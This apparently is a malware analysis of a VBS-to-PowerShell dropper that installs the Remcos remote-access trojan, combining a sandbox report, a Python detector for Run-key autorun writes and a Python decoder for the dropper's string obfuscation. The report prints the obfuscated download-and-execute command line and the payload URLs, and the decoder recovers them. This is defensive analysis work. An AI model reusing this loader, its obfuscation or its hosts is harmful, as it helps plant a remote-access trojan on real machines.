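    r'Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, '
    r'TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7',
    r'Details: "C:\Program Files\Vendor\updater.exe" /background, EventID: 13, EventType: SetValue, '
    r'Image: C:\Program Files\Vendor\setup.exe, ProcessId: 1234, '
    r'TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater',
]

FIELD_RE = re.compile(r"(\w+): (.*?)(?=, \w+: |$)")
AUTORUN_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Locations a standard user can write to; a legitimate installer registers from Program Files.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# Microsoft-signed hosts that malware hides in; none of them should register third-party autoruns.
SUSPICIOUS_WRITERS = {"msiexec.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def parse_record(line):
    """Split one 'key: value, key: value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def autorun_target(details):
    """The program an autorun value launches: a quoted path, else the first token."""
    m = re.match(r'"([^"]+)"|(\S+)', details.strip())
    return (m.group(1) or m.group(2)) if m else details


def autorun_findings(lines):
    """Return the autorun writes worth an analyst's attention, each with its reasons."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        key = rec.get("TargetObject", "")
        if rec.get("EventID") != "13" or not AUTORUN_RE.search(key):
            continue
        path = autorun_target(rec.get("Details", ""))
        writer = PureWindowsPath(rec.get("Image", "")).name.lower()
        reasons = []
        if path.lower().startswith(USER_WRITABLE):
            reasons.append(f"autorun points into a user-writable directory: {path}")
        if writer in SUSPICIOUS_WRITERS:
            reasons.append(f"value written by {writer} (pid {rec.get('ProcessId')})")
        if reasons:
            findings.append({
                "hive": "HKLM" if key.startswith("HKEY_LOCAL_MACHINE") else "HKCU",
                "wow64": "WOW6432Node" in key,   # 32-bit registry view, as a 32-bit writer sees it
                "value": key.rsplit("\\", 1)[-1],
                "path": path,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in autorun_findings(RECORDS):
        view = " (WOW6432Node)" if f["wow64"] else ""
        print(f"{f['hive']}{view} Run\\{f['value']} -> {f['path']}")
        for r in f["reasons"]:
            print("   ", r)
```

Both heuristics fire on the report's entries and neither fires on the control record; in production the user-writable prefix list should also cover per-user AppData and Temp, and the same check belongs on RunOnce, Winlogon and the Explorer shell folders, not only the Run key matched here.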
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-12-23T06:41:44.226095+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4:49737 | 104.21.86.72:443 | TCP


AV Detection

Source: Yara match | File source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown | HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2165802871.0000000006E2A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000000.2166500029.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000A.00000000.2266505717.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe, 0000000B.00000000.2347262124.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, remcos.exe.8.dr
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1700456681.0000021385281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698077766.0000021385081000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+m source: powershell.exe, 00000003.00000002.2055634265.0000000008BD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2019662882.0000000003564000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2049592368.0000000007B66000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.86.72:443
Source: global traffic | HTTP traffic detected: GET /CACZkcPf/Schmeer.aca HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /rTPVLEPs/asyclWl80.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: of1x.icu
Source: powershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1821899527.00000223C07CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://of1x.icu
Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1821899527.00000223BF688000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.i
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.ic
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/
Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/1
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/C
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CA
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CAC
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZ
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZk
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZkc
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZkcP
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZkcPf
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZkcPf/
Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu/CACZkcPf/S
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Sc
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Sch
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schm
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schme
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmee
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.a
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.ac
              Source: powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.aca
              Source: powershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.acaP
              Source: powershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/CACZkcPf/Schmeer.acaXR
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/XV
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2185684711.0000000021F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rTPVLEPs/asyclWl80.bin
              Source: msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/rTPVLEPs/asyclWl80.binN
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match | File source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR

              System Summary

              Source: amsi32_764.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file: Call Vikingernes238.ShellExecute( "p" + Omskifteligste,Shandies & Gilliver & Shandies ,"","",0)
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
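              The PowerShell stage in the command line above builds every string it needs through Katukina(), which keeps every fifth character of its argument starting at offset 4 and discards the four filler characters in front of each one. The script below is an added example (it is not part of the Joe Sandbox report and not the malware's own code): it reimplements that loop and runs it over the obfuscated literals copied from the report's command line, rejoining the two-part $Katalogbestilling and the wrapped $Injuriesag literal the way the script does. It recovers the Net.WebClient download class, the Tls12 protocol setting, the User-Agent header and its Mozilla/ prefix, the IEX executor, the first-stage URL https://of1x.icu/CACZkcPf/Schmeer.aca that also appears in the memory strings above, and the expression that builds the drop path from $env:AppData and $overgreasiness (the report's C:\Users\user\AppData\Roaming\Wealthmaking.Asr). The dictionary keys are the script's own variable names; stage_path is a label chosen here for the first Myndiges() argument.

```python
"""Decoder for the Katukina() string obfuscation used by the PowerShell stage.

Added example: not part of the Joe Sandbox report and not the malware's own
code. The obfuscated literals are copied from the command line the report
records; the decoder reproduces the script's loop

    $i = 4; do { $out += $s[$i]; $i += 5 } until (!$s[$i])

which keeps every fifth character starting at offset 4.
"""

START, STEP = 4, 5  # $Havanlggene=4 and $Protestantiskes+=5 in the script


def katukina(blob: str, start: int = START, step: int = STEP) -> str:
    """Return every `step`-th character of `blob` beginning at `start`.

    Indexing past the end of a PowerShell string yields $null, which is
    falsy, so the do/until loop stops at the first out-of-range index;
    an extended slice is the exact equivalent.
    """
    return blob[start::step]


# Variable name -> Katukina() argument(s), copied from the report's command
# line. $Katalogbestilling is built from two calls joined with +=, so it is
# stored as two parts; the $Injuriesag literal is rejoined across the
# report's line wrap. "duplicand" is the literal later passed through
# Katukina() by Myndiges(); "stage_path" (label chosen here) is the argument
# of the first Myndiges() call.
OBFUSCATED = {
    "Katalogbestilling": [" ovlnTommE ejutAppe.BesvW",
                          "B kkEAff.BU secSnitLBajai FilEFor nNonrT"],
    "Sylterne": ["FortM S joSirezAnbeiSkablThrol,hroaOpre/"],
    "Nonagricultural": ["Non TSnerlStarsRuff1Revi2"],
    "Konfigurationsmanualers": ["JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T"],
    "Butleress": [" Auti eroE D vX"],
    "Taxiflyene192": ["P.em>"],
    "Injuriesag": ["MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. "
                   "Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/"
                   " ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata"],
    "duplicand": ["Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP "
                  "StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:"
                  "Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol "
                  "cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau "
                  "acklStutTTo.dUFigeR.harAReacl"],
    "stage_path": ["Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T "
                   "El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp "
                   "AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,"
                   "lipaSammsOverISt.tN OpbeTol s lavs"],
}


def decode_all(table=OBFUSCATED) -> dict:
    """Decode every literal, joining multi-part values as the script's += does."""
    return {name: "".join(katukina(part) for part in parts)
            for name, parts in table.items()}


def stage_summary(decoded: dict) -> dict:
    """Fold case the way PowerShell's case-insensitive binder does and split
    the URL literal on the recovered '>' separator ($Taxiflyene192)."""
    return {
        "download_class": "System." + decoded["Katalogbestilling"].lower(),
        "tls_setting": decoded["Nonagricultural"],
        "header": decoded["Konfigurationsmanualers"].upper(),
        "user_agent_prefix": decoded["Sylterne"],
        "executor": decoded["Butleress"].upper(),
        "url_list": decoded["Injuriesag"].split(decoded["Taxiflyene192"]),
        "drop_path_expr": decoded["stage_path"],
    }


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:24} {value}")
    print(stage_summary(decode_all()))
```

              One caveat when working from the rendered report rather than the raw command line: the report's HTML collapses runs of spaces inside the literals, and the 5-character stride depends on every filler character being present. The second $Sylterne part, the .Split() call and the New-Object call in the command line above each lost at least one double space that way and decode off by one from that point, so recover those from the sandbox's process dump or an EDR command-line field; the literals decoded here were checked to round-trip.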
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F63E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B76AB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B76B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B836BD8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04E3E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04E3F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04E3E5E0
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F63E3
              Source: Rokadernes.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5806
              Source: unknown | Process created: Commandline size = 5806
              Source: amsi32_764.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@12/8@1/1
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F2F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F7DD0 StartServiceCtrlDispatcherW,GetLastError
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Wealthmaking.Asr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-6US4Y7
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkgzrzdi.ndm.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=764
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
